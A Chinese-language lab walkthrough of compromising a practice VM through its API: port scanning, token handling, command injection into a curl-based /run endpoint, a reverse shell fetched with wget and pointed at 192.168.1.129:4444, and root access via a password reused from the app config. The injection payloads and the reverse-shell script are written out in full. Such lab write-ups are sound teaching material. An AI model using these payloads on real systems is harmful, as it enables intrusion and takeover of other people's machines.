# 靶场搭建

下载,直接导入就能用

IP: 192.168.1.137

# 渗透过程

# 信息初收集

22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    nginx 1.14.2
8080/tcp open  http    nginx 1.14.2
# http://192.168.1.137:8080/
[10:55:39] 200 -    2KB - /01                                               
[10:55:39] 200 -    2KB - /1                                                
[10:55:39] 200 -    2KB - /02                                               
[10:55:39] 200 -    2KB - /04                                               
[10:55:40] 200 -    2KB - /2                                                
[10:55:41] 200 -    2KB - /4                                                
[10:56:24] 405 -   64B  - /login                                            
[10:56:40] 200 -   29B  - /registration                                     
[10:56:41] 405 -  178B  - /run                                              
[10:56:42] 500 -   37B  - /secret                                           
[10:56:50] 200 -   17B  - /test                                             
[10:56:54] 200 -  140B  - /users  
{"users": [{"username": "patrick", "password": "$pbkdf2-sha256$29000$e0/J.V.rVSol5HxPqdW6Nw$FZJVgjNJIw99RIiojrT/gn9xRr9SI/RYn.CGf84r040"}]}

# api 测试

观察了一下,就是一些接口,拿 bp 根据 res 去测试

尝试使用给的账号和密码登录一下,无果,所以先注册一个账号看看怎么事,发送以下数据包

POST /registration HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
username=1&password=1

得到以下内容:

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:18:21 GMT
Content-Type: application/json
Content-Length: 355
Connection: close
{"message": "User 1 was created. Please use the login API to log in!", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTEwMSwianRpIjoiOGJkZGNhMmEtY2I3ZC00MmZjLTk3NzUtMGY4NjNhNTZlYTMxIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4NzkxMDEsImV4cCI6MTcxNDg4MDAwMX0.FVCqQo9SJPzLQybBsVwCw4WAaZUtkIQR5j-Y0mwUy30"}

login 一下这个账号

POST /login HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
username=1&password=1

拿到 cookie

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:28:37 GMT
Content-Type: application/json
Content-Length: 600
Connection: close
{"message": "Logged in as 1", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNjdhNGM1OGUtMTIwYS00NDYwLTg2OWMtODJmZTU2ZjMxODFlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4Nzk3MTcsImV4cCI6MTcxNDg4MDYxN30.5ipYzn89OxZoXKNv5BbXznQROQjGuICIYZMOVl89LVE", "refresh_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNDhmOWQxZTMtNjg4ZC00YWQyLWI1NzctZjhhOTczNTcxOWFjIiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiIxIiwibmJmIjoxNzE0ODc5NzE3LCJleHAiOjE3MTQ4ODMzMTd9.duC7xa7rPSjsLZpGu22Hw23t4jdDO1N5JgZapbAQidM"}

看一下 run 接口,根据提示感觉像是 RCE,通过返回的数据为 json 格式,猜测提交也要 json 格式,交了 {"url":"127.0.0.1:8080"} 上去发现还要 secret key ,马上想到 secret 页面。

打开看了一眼,发现 500。结合之前的信息,应该是要 cookie,但是不知道 cookie 的字段名称是什么,只好 fuzz 一下了。

应该不会很复杂,最后得到字段名: access_token_cookie ,通过发送 cookie 拿到了 secret_key: commandexecutionissecret

GET /secret HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNjdhNGM1OGUtMTIwYS00NDYwLTg2OWMtODJmZTU2ZjMxODFlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4Nzk3MTcsImV4cCI6MTcxNDg4MDYxN30.5ipYzn89OxZoXKNv5BbXznQROQjGuICIYZMOVl89LVE
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:35:25 GMT
Content-Type: application/json
Content-Length: 61
Connection: close
Set-Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg4MDEyNSwianRpIjoiZTlmZWQ0ZjUtZjM2Ny00NWQwLWI4ZTgtZjY1YzMwZmRlN2NmIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4ODAxMjUsImV4cCI6MTcxNDg4MTAyNX0.z-n754xqTpvCmTqnbZNTePOgmkNVZW8MNxWCjeJ9-Uk; Secure; HttpOnly; Path=/
{"ip-address": "", "secret_key": "commandexecutionissecret"}

然后再去 run 接口添加 secret_key 就可以执行了

POST /run HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 109
{"url":"127.0.0.1:80",
"secret_key":"commandexecutionissecret"}

# RCE

执行之后发现是 curl 命令,所以想到命令执行,那么就去拼接

{"url":"$(whoami).fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}

发现是能够命令执行的,搞一个反弹 shell 试了一下,发现直接给我 ban 了,估计有关键字检测,好爱

传一个 shell.sh,直接弹

shell.sh 如下

#!/bin/bash
bash -i >& /dev/tcp/192.168.1.129/4444 0>&1

提交命令如下

{"url":"`wget http://192.168.1.129/shell.txt -O shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
{"url":"`chmod +x shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
{"url":"`./shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}

OK 了家人们,shell 弹出来了

# 提权

翻一下目录

app.config['SECRET_KEY'] = 'snakeoilisnotgoodforcorporations'
app.config['JWT_SECRET_KEY'] = 'NOreasonableDOUBTthisPASSWORDisGOOD

发现可能的密码,发现后一个是该账号的密码,那么我们直接 sudo su

得到了 root 权限。

# 小结

api 测试 + 命令执行

JWT_SECRET_KEY 是指 JSON Web Token(JWT)的密钥。在使用 JWT 进行身份验证和授权时,通常需要一个密钥来对令牌进行签名和验证。只是这里和 patrick 账号的密码一样 ==、